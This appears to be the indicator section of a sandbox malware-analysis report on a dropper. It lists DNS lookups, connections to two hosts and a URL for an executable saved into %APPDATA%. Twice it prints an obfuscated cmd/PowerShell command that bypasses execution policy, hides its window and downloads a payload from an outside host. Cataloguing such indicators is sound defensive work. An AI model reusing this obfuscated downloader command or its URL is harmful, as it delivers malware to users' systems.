Technical information
- http://nexcontech.com/wp-content/ay4te/mdp5.exe as %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "po^w^E^r^shEL^l^.^EX^e -EX^ECu^Ti^ONp^O^licy ^b^Y^p^AsS^ -^n^o^P^R^OFILE^ ^-^WInDowS^Ty^lE h^IDDEN (NEw-^oBJE^ct s^Yst^E^M.^nET^.We^b^c^LiEn^T^).DOW^nlO^ADFIl^E('http://nexcontech.c...
- %APPDATA%.exe
- 'ne###ntech.com':80
- 'ht##.#odhosting.net':80
- http://ne###ntech.com/wp-content/Ay4TE/mdp5.exe
- http://ht##.#odhosting.net/404.html
- DNS ASK ne###ntech.com
- DNS ASK ht##.#odhosting.net
- '<SYSTEM32>\cmd.exe' /C "po^w^E^r^shEL^l^.^EX^e -EX^ECu^Ti^ONp^O^licy ^b^Y^p^AsS^ -^n^o^P^R^OFILE^ ^-^WInDowS^Ty^lE h^IDDEN (NEw-^oBJE^ct s^Yst^E^M.^nET^.We^b^c^LiEn^T^).DOW^nlO^ADFIl^E('http://nexcontech.c...' (with a hidden window)